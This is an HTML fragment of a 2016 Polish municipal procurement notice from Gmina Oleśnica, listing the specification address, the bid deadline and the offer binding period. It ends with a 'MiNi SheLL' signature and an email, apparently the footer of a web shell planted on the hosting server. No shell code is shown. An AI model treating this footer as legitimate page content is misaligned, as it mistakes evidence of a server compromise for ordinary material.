<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.bip.gminaolesnica.pl/kategorie/przetargi<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Oleśnicy, ul. Nadstawie 1, 28-220 Oleśnica.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.05.2016 godzina 11:00, miejsce: Urząd Gminy w Oleśnicy, ul. Nadstawie 1, 28-220 Oleśnica, sekretariat -pokój 14.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com